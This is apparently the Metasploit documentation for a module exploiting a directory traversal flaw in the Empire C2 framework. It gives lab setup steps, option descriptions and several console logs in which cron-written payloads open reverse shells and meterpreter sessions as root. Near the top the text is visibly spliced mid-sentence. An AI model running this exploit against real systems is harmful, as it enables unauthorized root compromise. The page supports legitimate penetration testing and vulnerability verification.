## Vulnerable Application This module exploits a directory traversal vulnerability in both BC-SECURITY/Empire C2 Framework (<5.9.3) and ProjectEmpire/Empire ( bash apt update apt install cron cron ``` \(Payload will be loaded in container but you have to manually set up cron on container.) 6. Run the client. `docker run -it --net="host" bcsecurity/empire:v5.9.2 client` 7. Execute Empire listener on client. ```bash uselistener http set Host set Port execute ``` #### ProjectEmpire/Empire 1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. 2. Install Kali Linux (or other Linux distro) in your virtualization engine. 3. Clone empire. `git clone https://github.com/EmpireProject/Empire.git` 4. `cd Empire` 5. `git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110` 6. `docker pull empireproject/empire` 7. `docker run -it --net="host" -v $(pwd):/opt/Empire -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d empireproject/empire /bin/bash` (Payload will be loaded in host not in container.) or ``` docker run -it --net="host" empireproject/empire /bin/bash cron ``` (Payload will be loaded in container but you have to manually set up cron on container.) 8. `cd setup` 9. `./reset.sh` (Empire start) 10. Execute listener. ```bash listeners set Host set Port run ``` ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: `use exploit/linux/http/empire_skywalker` 4. Do: `set rhost ` 5. Do: `set rport ` 6. Do: `set lhost ` 7. Optional: `set CVE ` 8. Do: `run` 9. Have the generated request processed by a vulnerable version of Empire 10. You should get a shell or meterpreter ## Options ### TARGETURI (optional) This is the Base URI path. This is used when CVE is set to `Original`. Default is `/`. ### STAGE0_URI (required) This is the URI path requested by the initial launcher. This is used when CVE is set to `Original`. Default is `index.asp`. ### STAGE1_URI (required) This is the URI path used by the RSA key post. This is used when CVE is set to `Original`. Default is `index.jsp` ### PROFILE (optional) This is Empire agent traffic profile URI. This is used when CVE is set to `Original`. ### CVE (required) This is the vulnerability to use. Default is `CVE-2024-6127`, but `Original` can also be chosen. ### STAGE_PATH (required) This is the Empire's default staging path. This is used when CVE is set to `CVE-2024-6127`. Default is `login/process.php`. ([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169)) ### PROFILE (required) This is the Empire's default communication profile agent. This is used when CVE is set to `CVE-2024-6127`. Default is `Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko` ([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169)) ## Scenarios ### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80) ``` msf > use exploit/linux/http/empire_skywalker [*] No payload configured, defaulting to python/meterpreter/reverse_tcp msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7 rhost => 192.168.56.7 msf exploit(linux/http/empire_skywalker) > set rport 80 rport => 80 msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf exploit(linux/http/empire_skywalker) > check [*] 192.168.56.7:80 - The target appears to be vulnerable. msf exploit(linux/http/empire_skywalker) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Successfully negotiated an artificial Empire agent [*] Writing payload to /tmp/NYLkIKRK [*] Writing cron job to /etc/cron.d/AeVTTPiZ [*] Waiting for cron job to run, can take up to 60 seconds [*] Sending stage (24772 bytes) to 192.168.56.7 [+] Deleted /etc/cron.d/AeVTTPiZ [+] Deleted /tmp/NYLkIKRK [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900 [!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target meterpreter > sysinfo Computer : kali OS : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17) Architecture : x64 System Language : en_US Meterpreter : python/linux ``` ### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080) ``` msf > use exploit/linux/http/empire_skywalker [*] Using configured payload linux/x86/shell/reverse_tcp msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf exploit(linux/http/empire_skywalker) > set rport 8080 rport => 8080 msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf exploit(linux/http/empire_skywalker) > set target 1 target => 1 msf exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp payload => linux/x86/shell/reverse_tcp msf exploit(linux/http/empire_skywalker) > check [*] 192.168.56.6:8080 - The target appears to be vulnerable. msf exploit(linux/http/empire_skywalker) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Successfully negotiated an artificial Empire agent [*] Writing payload to /tmp/jJzYkeKV [*] Writing cron job to /etc/cron.d/nFnFIbim [*] Waiting for cron job to run, can take up to 60 seconds [*] Sending stage (36 bytes) to 192.168.56.6 [+] Deleted /etc/cron.d/nFnFIbim [+] Deleted /tmp/jJzYkeKV [!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result [*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900 whoami root ``` ### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080) ``` msf > use exploit/linux/http/empire_skywalker [*] Using configured payload linux/x86/shell/reverse_tcp msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf exploit(linux/http/empire_skywalker) > set rport 8080 rport => 8080 msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf exploit(linux/http/empire_skywalker) > set target 2 target => 2 msf exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp payload => linux/x64/shell/reverse_tcp msf exploit(linux/http/empire_skywalker) > check [*] 192.168.56.6:8080 - The target appears to be vulnerable. msf exploit(linux/http/empire_skywalker) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Successfully negotiated an artificial Empire agent [*] Writing payload to /tmp/qxlOSIYF [*] Writing cron job to /etc/cron.d/ugrYIJzf [*] Waiting for cron job to run, can take up to 60 seconds [*] Sending stage (38 bytes) to 192.168.56.6 [+] Deleted /etc/cron.d/ugrYIJzf [+] Deleted /tmp/qxlOSIYF [!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result [*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900 whoami root ``` ### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 0, port 8080) ``` msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf exploit(linux/http/empire_skywalker) > set rport 8080 rport => 8080 msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf exploit(linux/http/empire_skywalker) > set CVE Original CVE => Original msf exploit(linux/http/empire_skywalker) > check [*] 192.168.56.6:8080 - The target appears to be vulnerable. msf exploit(linux/http/empire_skywalker) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Successfully negotiated an artificial Empire agent [*] Writing payload to /tmp/PSDaqPOJ [*] Writing cron job to /etc/cron.d/KQlwBZQk [*] Waiting for cron job to run, can take up to 60 seconds [*] Sending stage (24772 bytes) to 192.168.56.6 [+] Deleted /etc/cron.d/KQlwBZQk [+] Deleted /tmp/PSDaqPOJ [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:38552) at 2024-07-24 18:01:04 +0900 [!] This exploit may require manual cleanup of '/agent.log' on the target meterpreter > sysinfo Computer : kali OS : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17) Architecture : x64 System Language : en_US Meterpreter : python/linux meterpreter > ``` ### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080) ``` msf > use exploit/linux/http/empire_skywalker [*] Using configured payload linux/x86/shell/reverse_tcp msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf exploit(linux/http/empire_skywalker) > set rport 8080 rport => 8080 msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf exploit(linux/http/empire_skywalker) > set CVE Original CVE => Original msf exploit(linux/http/empire_skywalker) > set target 1 target => 1 msf exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp payload => linux/x86/shell/reverse_tcp msf exploit(linux/http/empire_skywalker) > check [*] 192.168.56.6:8080 - The target appears to be vulnerable. msf exploit(linux/http/empire_skywalker) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Successfully negotiated an artificial Empire agent [*] Writing payload to /tmp/VzTAquhE [*] Writing cron job to /etc/cron.d/LjvThMOu [*] Waiting for cron job to run, can take up to 60 seconds [*] Sending stage (36 bytes) to 192.168.56.6 [+] Deleted /etc/cron.d/LjvThMOu [+] Deleted /tmp/VzTAquhE [!] Tried to delete /agent.log, unknown result [*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:47140) at 2024-07-24 18:06:08 +0900 whoami root ``` ### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080) ``` msf > use exploit/linux/http/empire_skywalker [*] Using configured payload linux/x86/shell/reverse_tcp msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf exploit(linux/http/empire_skywalker) > set rport 8080 rport => 8080 msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf exploit(linux/http/empire_skywalker) > set cve Original cve => Original msf exploit(linux/http/empire_skywalker) > set target 2 target => 2 msf exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp payload => linux/x64/shell/reverse_tcp msf exploit(linux/http/empire_skywalker) > check [*] 192.168.56.6:8080 - The target appears to be vulnerable. msf exploit(linux/http/empire_skywalker) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Successfully negotiated an artificial Empire agent [*] Writing payload to /tmp/uuTqlfDp [*] Writing cron job to /etc/cron.d/frDtYnmD [*] Waiting for cron job to run, can take up to 60 seconds [*] Sending stage (38 bytes) to 192.168.56.6 [+] Deleted /etc/cron.d/frDtYnmD [+] Deleted /tmp/uuTqlfDp [!] Tried to delete /agent.log, unknown result [*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:51566) at 2024-07-24 18:08:08 +0900 whoami root ```